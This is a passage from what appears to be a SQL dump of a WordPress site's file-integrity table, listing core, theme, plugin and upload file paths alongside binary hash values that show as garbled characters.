w�����T�A;�}Ad','��韌�\'�MN�+�ƺ�R����g','',0,'?'),('/��<&�����1K[�{','wp-content/plugins/wordpress-seo/src/deprecated/admin/license-page-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r-y%2�#��e��','�V$��jD3�D1�c��~��?R7ݹ@�','',0,'?'),('/鹠���ΰ1�iw��','wp-includes/images/uploader-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&-��O��Õ�~','���r�\0����\'_>��6��QW��4ڠR��','',0,'?'),('/��f��P�j>X��','wp-includes/sitemaps/class-wp-sitemaps-renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V}d��T�ܧ�C\"º',':�i��K��,�c}i1�d��4l�c�2Œ�2','',0,'?'),('/�����5SQU۶v+�','wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ni���R�7�\"��j�O','DQ�I!c�̚��d��-&�e�]B���7','',0,'?'),('0�� �n�?7��','wp-content/uploads/2016/11/roof-plate-updraft-pre-smush-original.jpg',0,'�p����84�zɓ','�p����84�zɓ','��Y�_k���?1�Հއ�����óu�','',0,'?'),('0 ]U�fu�qq�','wp-content/languages/plugins/wordpress-seo-en_GB-9020928b9c602134a9dd815ac279258f.json',0,'�>�C�� x�Gu��','�>�C�� x�Gu��','���� (���(��6*�:�u(�z��(8k�','',0,'?'),('01���$��t���/�','wp-content/plugins/redirection/locale/json/redirection-es_MX.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���IHc$3�+��','��{��\"c��!�Q-{@�)�\\M�t^q\"$�C','',0,'?'),('0<����lڿ��J��','wp-includes/js/wp-backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�/�����7���b','���9J7�A���G���uq!@/nS]�<o�e�}�','',0,'?'),('0<�9���u�;SZ\rj','wp-content/themes/twentytwentyone/inc/template-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�de�x���2{�C�d�','���3�d�]L���_|�����DIH5-�\0.','',0,'?'),('0D�9�_�yK�$�B','wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-frontend-page-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n����8��- ƧZ','� ���Jm�dk�ۚ�a�h�4�$;��A�$','',0,'?'),('0S���~Z3i�x��','wp-content/plugins/wordpress-seo/css/dist/yoast-extensions-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' v�$2�t\r#h`Sj ','Y��)C~i����� .��ќ߇���L�','',0,'?'),('0Y.q�~����D����','wp-content/plugins/wordpress-seo/src/helpers/twitter/image-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B��dx�%��W�','�-i)X�F5��S���m�\'2-ǩ�4���M�H','',0,'?'),('0]�qK\'�f�x����','wp-includes/js/tinymce/plugins/compat3x/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�{��p��Ҡ','��m�澑�[�S3��\'�J�*��Sts�j���','',0,'?'),('0j�Vƽ�f:�5��`�\\','wp-includes/js/customize-selective-refresh.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�G�埳6�0�b�','G���i�A�w_�P�g�9����Oɓ��M�','',0,'?'),('0x�h��ͭK��3��T','wp-includes/class-wp-fatal-error-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tGM[��@̻��/f','��5�$�z�@�R�n�cd�����w��','',0,'?'),('0����a�O�ZI|I�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�HY ��²��','zI]�_�Dz��!�bш�6�d�uY�3','',0,'?'),('0����k� ?ޞ���','wp-includes/js/jquery/ui/effect-scale.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',ʡ0��\\K4\'��t�','Ұ�-yߎf+�)�R��q[t�QJ��Z ?','',0,'?'),('0��<K�}�����ׇ','wp-includes/blocks/image/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4������h�a','`ƛ\"Gj�s-с]�5�l�YYF�f���U|V�','',0,'?'),('0���E\00���X�H','wp-includes/js/colorpicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m{��>l�Z�կ��','��\'�ۚ�c覯z+�*��S8\"�� [�귲;�','',0,'?'),('0�����|�~>P��','wp-content/uploads/2019/06/fibre-optic-updraft-pre-smush-original.jpg',0,'͚L�0(�s�����','͚L�0(�s�����','v�Ƚ�R7�d��O���VXy$�~��0�?��','',0,'?'),('0��h�?�DIt�N$��p','wp-content/uploads/2019/09/garden-waste-350x220.jpg',0,'�4��auD6�2','�4��auD6�2','Iؗ��y�3�q��~��S\Z��e��i��ɳ�','',0,'?'),('0�Q}j^�a��o�[j�','wp-content/plugins/wordpress-seo/languages/wordpress-seo-fa_IR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r$F?�W#���v�r��','f�\'�uE��K�ݑ��f,b�mPC��','',0,'?'),('0���m&��\"�5� µT','wp-content/plugins/wordpress-seo/src/context/meta-tags-context.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�3�E��*�A:','�J��Mpf�.Y��6q���IJM2�C�{��R','',0,'?'),('0�dۦZP�2��o�','wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ս$����6�\"�','��^h\'z�[��j���ӊ%\Z�pã��j.�S','',0,'?'),('0�ň����}m�X9�q','wp-content/plugins/wp-cerber/assets/flags/zm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\|e�D�gk�^���','�yЩ&VUą;�}��D4E���3�)\\','',0,'?'),('0��~ڋ3��;��TE�','wp-content/plugins/wordpress-seo/css/dist/workouts-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2�:w����K�','�B��h�뀄�G�^�[K;�zy��$�-C','',0,'?'),('0����I��\Z8�\'�x','wp-content/plugins/wp-cerber/assets/flags/tk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȕ��n��e�Y�T��','I��/�:���5s ;�#bi)��4k ����','',0,'?'),('0�i��LS� �q���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-firewall-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n�\\���&4�h�','�Ꭴ 6����1|�@\"��6��d�%w��G','',0,'?'),('0��$X8F�nŃk���','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Մ�;vD�$:�~ƌƗ','��\r��|+���mA��I���O<�(��N�\r�g','',0,'?'),('1!� I��<Em#','wp-content/plugins/wp-cerber/assets/flags/ee.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��h�~�\rO�����','��R�Bᣛ�݇84ɐ6B����\0ȸ�:l-�IB','',0,'?'),('1E�Ϻ�SF�TúE��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/UploadedFile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�QcC#�y���Z���','x�]�ع�z#�u��h8�4�~.���;�>�@[�b','',0,'?'),('1j�S�JmQ��s��7','wp-content/plugins/wp-cerber/languages/wp-cerber-pl_PL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L��X�p2�_d\0','Ea�o�\Z��zz=2�c}���8���ǃW','',0,'?'),('1-�����g97���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�B���.��}�F�','��c�(����k1�����2�Qw4��?0','',0,'?'),('187��53*ة�`ED','wp-content/plugins/wordpress-seo/images/seo_fitness_assistants_fit.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����������<2','pʰ~l滀�ʙ6��6���jDK��\r3q��','',0,'?'),('1?o�x��<�?���6','wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?v@�Y�a�p�v���','p���ZʇO�F�M��4�V92�QP��\0����','',0,'?'),('1A����,\ns����v','wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��)��ɾNS(�! 4Z','��/�[��f �nU���!79�8^94����M','',0,'?'),('1Ag\r%�1��kp','wp-content/plugins/redirection/actions/url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��7��銡d��V','Q�����J3��2�Aؿ��N�u�+TR܊$�','',0,'?'),('1G�[��D��qW�t��','wp-content/plugins/wp-cerber/assets/flags/gy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��B��}��>_�','L�:�,���B[���aa<���w�*@������','',0,'?'),('1N�i�?�b�4SC�%a�','wp-content/uploads/2019/12/pexels-photo-2098443.jpeg',0,'-�:��!Ü�S��>�','-�:��!Ü�S��>�','v�����\rPT�dzc7��&i�#,2�o\0�','',0,'?'),('1^��BsCZU*��M�>','wp-content/themes/twentytwenty/assets/fonts/inter/Inter-upright-var.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/o�-�6��ѥ�p|','���dd�^�#QҒ\Z�#q�^�Ɠ�J�w�','',0,'?'),('1lɱ4�0Lt��KT��','wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/admin/link-count-indexing-list-item-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t\0��R����!�j','����\0�p�e�d�Jg8`z0�|`rH���','',0,'?'),('1s�)6�Ӷ���C��Η','wp-admin/user/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T^�1�����A�|','Y��%մ9����N��?\\v\\a��M���~','',0,'?'),('1|v�<��-V��A]�','wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-installation-error-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N����C�X��#W�R','#�V�/�_��|/��̷�Y�ґ��t\rt��','',0,'?'),('1�3\r\rI��W��\\��','wp-content/themes/twentytwentyone/assets/sass/03-generic/breakpoints.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ov_J�ex�� V-\r','�߬a�#�1Ȫ���s�9��;�\0e�oH߉T��','',0,'?'),('1��/ `�s���;=\Z','wp-content/plugins/wordpress-seo/src/repositories/indexable-repository.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�W�\rE�uhO+M','���^{<v~u4�x2�&A\0jw�;o&摊��7pk','',0,'?'),('1�7�F0ܩ��^ �l','wp-content/plugins/wp-cerber/admin/cerber-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��uCī�(��ekڵ�','ǹ�l���R��\Z���bf��$�hq����','',0,'?'),('1���\'Y\"z�Z�J4��','wp-content/uploads/2019/08/thai-property-300x250.jpg',0,'���j|!<VS��E.','���j|!<VS��E.','`˾iG\r8��8����Vؙ�X���u0','',0,'?'),('1���pa�`H0ߢ�e','wp-includes/js/dist/url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-LS|}�a�����5�','f���\r��\Z�Aa�m��#��O�����[�_�','',0,'?'),('1�W͎�XD=-���','wp-content/plugins/wordpress-seo/src/generators/schema/howto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[y>�h,<c����','0����6�\rr��m-��\\�+=�`��m�b,','',0,'?'),('1БY���4I^p�','wp-includes/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`q8�2�G<A9\ZQ�',']�T=�76uN&=8W<�%����','',0,'?'),('1�ه�җ\"R���\"','wp-content/themes/twentytwenty/classes/class-twentytwenty-script-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��-~cJ^�匲#2�','���-��i�����:4Qky��X/I���','',0,'?'),('1�EfQ�v#)�\n�0EkQ','wp-admin/images/media-button-image.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m� \'���A','iķ��z[����/\"� X���{�o��:��','',0,'?'),('1��X�/�t60^Ҁ!�7','wp-includes/js/comment-reply.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Yó8y�F0��P^','�o��%cܫԕ-��zt�����Qs��<{�','',0,'?'),('2Z�v��p$x�@V�','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G��\"�i;\\!S{_+','��<��N�.����S�fH@V��s�WLVd��i','',0,'?'),('2J�y*�m����]W','wp-includes/js/dist/a11y.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D5*dQ&8W.����I\0','yc�E�`��w}�%�4sug�Mľ~\r�I�ˑ \Z','',0,'?'),('2b�U��\0��s�pd0�','wp-includes/js/clipboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�a�d]��.;��W;','zD�!X��s��)ؑ����3�l,��l�Q�CJrU','',0,'?'),('2&M�V?fĐ�m���','wp-content/plugins/redirection/locale/redirection-fa_IR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z)V�ݐ��J_��Ҝ�','��1̚I�o{��\Z�lR\'|�+��F�\n���','',0,'?'),('2?��k�>�\"J]Sa!','wp-content/plugins/wp-cerber/languages/wp-cerber-zh_TW.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hoĠAј����','t�F>E�:�\')9`���u��ě��W�','',0,'?'),('2@�j�j\0�kӲ��Ә','wp-admin/includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �APZ��в!��Yx��','����T�8��iʅ��{`br�8���O\'��','',0,'?'),('2D��%�J����?��\Z','wp-includes/js/dist/wordcount.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{ȦAr`�{��F�F��','o�V�F�p��7�h`��\"Ǘ�j��E���=�','',0,'?'),('2Y� ��oq&�Z���','wp-includes/class-wp-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݕ��Fԯ�8f�6��','�����y{���tl+RJ���N��\nj�R','',0,'?'),('2gl�bC�d�M`H��','wp-includes/css/dist/block-library/reset.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͤ;���a���\n��eQ','\'��l�CPh2��C :�\r��}/�tp�8,�1','',0,'?'),('2j�L,���W\r��W$��','wp-admin/css/colors/sunrise/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ir�~�����|�','U:1\0�^��p���ˌ�\r|F��t懳T�#�','',0,'?'),('2o�8ɦ�hY9� Z<','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xu��mlsV�L','y߷x��c�Xp���FRj�֚��u�u9�u�','',0,'?'),('2r}�V�ĥ$^���n/','wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^n=(��&��݂�N&','S��DIB�z�_-?(Y��pE�y�ƹA�','',0,'?'),('2���8�`�/J�t','wp-content/plugins/redirection/matches/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>z�~C(Mغ�~�','j�QE߆ؾ�7�%��Fl�T\"�&��m���\'','',0,'?'),('2���!C|�R4�ض�J','wp-includes/blocks/paragraph/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�)v���k \0��','H����к_W�\Z#� �K�߂�t]VL���Iʪ','',0,'?'),('2�E���γŷ���','wp-content/plugins/wp-cerber/assets/flags/ps.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I��P-�6@%','%�AD���E���P�Ǖ��|�u��Ć�C�!','',0,'?'),('2�@����\ZJ�%!�','wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/admin/indexation-list-item-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�4�`$K�\r�W�&�','bu�b_���]s ~#���R�{1G`���EcA�','',0,'?'),('2�|�(ủt��T��','wp-admin/privacy-policy-guide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������K8ۨ��)','.�%�����]:/$zԢ��S�_�)kER��','',0,'?'),('2��㺨a|F�l3]�','wp-includes/customize/class-wp-customize-new-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �sL2/�B�����','H\'�s�ӽ����I�$��Ӧ�ͤ�X�!�','',0,'?'),('2�v��\'��9\r��z','wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('2ģ��_�D�x���','wp-content/plugins/wordfence/views/common/block-navigation-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�����~�}t.�K','M�N��������F`\r9���ӫ�rP�,Q','',0,'?'),('2��1�����)�nZ','wp-content/plugins/wp-cerber/languages/wp-cerber-pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����5�����N�','�^�?�t}�?�Ce�A��pr3C���<m','',0,'?'),('2�r��>�;��4�R\n','wp-content/uploads/2019/08/health2-300x250.jpg',0,'���-�?[��(8�','���-�?[��(8�','��(F�N�~�`z�H�\ZS���ݔ,����:���','',0,'?'),('2��Zs��+z��','wp-includes/css/dist/block-directory/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��ܕO�D~�r0M\0m}','Ms���w o�d`�/�<��1�@��\'}���','',0,'?'),('2�0mK�:r²\\0\nB�','wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x���9/��Z�h�6�\n','�J<<���x?�#�o������Jn8�:j��','',0,'?'),('2��^(��ʭ�-^x��','wp-includes/SimplePie/Enclosure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(2ROf;Vkj�','�������`�.۾H�,�x1���8q?�L�}]','',0,'?'),('3&|P®�+�B#��X','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/zh-TW.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UJ\"|+��l���T@','�+d�ǖ�Q ��\\ >Ѿ#IV�L�RF��\"{��','',0,'?'),('3)e/`���/\r�Ph=','wp-content/plugins/wp-cerber/assets/flags/bf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��>��=��$�.��','�Ȋ:��h�.�n(xD⃪F\"{`iN�\0#��','',0,'?'),('3+z��.���6Q~]y[','wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�R?�\"�`�$�`','! �n��śU7B��5gr� 1�*;R�','',0,'?'),('3Y�#��6r\n�Yp�$��','wordfence-waf.php',0,'L�G�i���Y�����','L�G�i���Y�����','~���*�Z-b0,��A?��>L���G�\"Z����','',0,'?'),('3^�����yxGw��\Z','wp-content/uploads/2019/08/Therapy-768x291.jpg',0,'\'F�M��}f�mkQ�ų','\'F�M��}f�mkQ�ų','�w����$�h460��ǐ� ��*KyÍ','',0,'?'),('3cF�/�s�V��tj','wp-content/plugins/wordpress-seo/src/schema-templates/preparation-time.schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B�%@G��b�','�`iB�#�-��e�1_�B��p�\\P�I\'�M��','',0,'?'),('3d�Ϋ�jK�<u��c!w','wp-content/plugins/wordpress-seo/src/helpers/schema/article-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~��ꐦ���/�','�TĒ�e����h��e��*���0@$���','',0,'?'),('3h���\"I+[��E','wp-includes/js/clipboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G]��n�ma��sī�','��o~�S�$� L��ޮ\'�2����l�r','',0,'?'),('3k��oW�5 k[mq','wp-admin/includes/continents-cities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pg\Z*����Z�\0H4|�','���r}\n�w�u�Z�2�}KX���/��','',0,'?'),('3p���\\�8�lD�q','wp-includes/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��*�kLwB��d�=','ec[d�M?H�|�KY�\04��@� QA��:FF �','',0,'?'),('3z\'�O��v�J&�� ','wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�z#�� �Btz���','5wm�[EGj\"�\Z\Z���@¨,%�B�iAn��-�','',0,'?'),('3��L�d@��3,�E�','wp-content/languages/en_GB-4a38fe1c0c45989e44682ba6109d9f46.json',0,'f7]_*�V���3�8�9','f7]_*�V���3�8�9','a��l\"���V��Un`��T\r�A���I��','',0,'?'),('3�S�#ǣ+Ke�\0Ⱦ','wp-content/plugins/wp-cerber/assets/flags/la.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3MU\'���\Zkr�c&��','[�lԬ�`�l !_���>�kwd�X��p���_','',0,'?'),('3��N(�$�K]e','wp-content/uploads/2019/12/pexels-photo-300x200.jpg',0,'�M��{҄K�ng�rA','�M��{҄K�ng�rA','�T/�3�A�OQ��](\0\\���}dw�:y��','',0,'?'),('3�s���-1���!','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/QueryBuilderTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �Է�8H�rIЩ�h','W�TtƋv��v��ҕ.���!Hj�q�Wou@5','',0,'?'),('3��J%k������?�','wp-content/plugins/wordpress-seo/admin/views/tabs/network/features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8\Z���\'� i�ɘ#','Y��z���>w�g�O���������ŗD*:��','',0,'?'),('3��JΑTg�0��\'e','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`4���uB\nE�#@��W',')r�xUYJ�;hpjH{\\����1\'#�� s�','',0,'?'),('3�l���V9Np�','wp-content/plugins/wordpress-seo/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~�S}L�~#vv5�+,','-j�H�p�3Ů՚%<O�.�4L��:�v�&c�','',0,'?'),('3���\'���RK�Bf�','wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QO1�/<�>%\"�X��','�6�r�*�IY\0�C�9<��Jږ J*�xD','',0,'?'),('3��fQ3�h�5[��W�<','wp-includes/Text/Diff/Renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �C0�Y7O�@�GS','EWj�+��\\��=����}.��1\r��|','',0,'?'),('3���औO�5(�','wp-includes/theme.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۨ�8k���ur��hh','�2���]!�4��:��Q�y;8��mF�','',0,'?'),('3��ng\0��\\\0 �W','wp-includes/IXR/class-IXR-value.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�>�5l�j\0f�','�?h����͇ X��UP�O|H$�1���','',0,'?'),('3���g���BP��O','wp-content/plugins/redirection/locale/json/redirection-fr_FR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\r�j6��Ӷꡐ��','��H9>�����f�\Zjf���\\��`g��Q��','',0,'?'),('4\n�� m�]Ŀ�Њ��','wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��{\\� d����`�','���ǿ\'�ɜ�LҪ�B>��� &-�{���','',0,'?'),('4��$1AV�Re\r��:i','wp-content/plugins/redirection/matches/user-role.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1U��\"1��X�e�/��','��G4)�A�\'I�r(�\"蓴�d�F_�\Z��','',0,'?'),('4f�mFw��\n��>','wp-content/plugins/wordpress-seo/src/helpers/url-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_��E/\Z�I�\\','��=�}?z--_������+�=�z����X[I�S','',0,'?'),('4�31@�*r�����8','wp-includes/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ś�L�\\�Pڜ�U','c>�5�o��������_�T9�L~;�e7�','',0,'?'),('4m�6�)�:5�t�q�','wp-content/plugins/wordpress-seo/admin/import/plugins/class-importers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Қ;����','6)�I.Z�l2g�8��=,C��\Z�d>Xf��','',0,'?'),('4&��)A�4tf}�','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/rss-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��쐯�M7d~i�Q','�rc\r��)r*�@렏2��D��ΐ;E��','',0,'?'),('40\\-�oX���o�j�','wp-content/uploads/2016/11/interior-design-2047075_960_720-300x250.jpg',0,'�A�_�]���T\'�(9̜','�A�_�]���T\'�(9̜','��܉���y���}V@���D|��%�����f\"�','',0,'?'),('42��5�o=�S�#��','wp-content/plugins/wordpress-seo/admin/views/tabs/network/integrations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pG@x�y(�4�','��ػ�^��Y��ĴS0>ʑm��s�L�ǔ��H�','',0,'?'),('48�Vt���+^X�','wp-includes/pomo/mo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','! /�\"۵�$=�iU�','\rh�s�c��6Z$���P͡�\r!W%vD�~��j�','',0,'?'),('4;`߯z�? �{Ǟ@','wp-content/plugins/wordfence/images/2fa-whole.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h»����$\ZPfX�','�ƪɝ����U[Z~��^�d�\'�X�ٮ���','',0,'?'),('4AI�n09��7c`','wp-includes/js/tinymce/utils/validate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CL�1?o+;���{Y�','k�H��;�\0�kC�s� \'K�#45+eE|���0','',0,'?'),('4D�=�pg`6�z��y','wp-content/plugins/wordpress-seo/src/presenters/breadcrumbs-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0vGl��C����A��','����2س�K2~b��#��݈��\'�Q�R��r','',0,'?'),('4Lk�iADQ���%�P�','wp-content/plugins/wordpress-seo/src/conditionals/yoast-tools-page-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A���O¥���(i>','�=��T�tn��P�OS���Ä�diB��y�','',0,'?'),('4To���iE��t�','wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�s\r>J��(���E�','�K����(w��B$�\r�s��줇!�ਿ��D','',0,'?'),('4V6��uf ���J�Kd','wp-content/plugins/wordpress-seo/src/helpers/schema/image-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�4M�����>E`��','�{��,�켤E����D�o0��Bɿ�K�e','',0,'?'),('4Y�2$4�EUF�3M;�','wp-content/plugins/wordfence/js/jquery.tmpl.min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('4\\h��r��Iǝ��� ','wp-content/uploads/2019/08/Massages-updraft-pre-smush-original.jpg',0,'\n5H�+�)�}��','\n5H�+�)�}��','.��`)�U��?�\ZC�dk� ���-0���O�','',0,'?'),('4a�[I�}���H�m)','wp-admin/css/deprecated-media.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M>��_�^�����9F','.��*�AU�u0� \'�Q�2˻�=�x4w��g�','',0,'?'),('4���9�7��Tb��~~','wp-content/themes/twentynineteen/js/touch-keyboard-navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;0��#�B���n','ѹ�T)��f�-D�/kFb��y�����H�','',0,'?'),('4�qEyVS/��o}�','wp-includes/blocks/tag-cloud/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iCu�k�0)������\"',' H����>�W��!ס�Ȼ�e�h��d\r�-�Ҭ 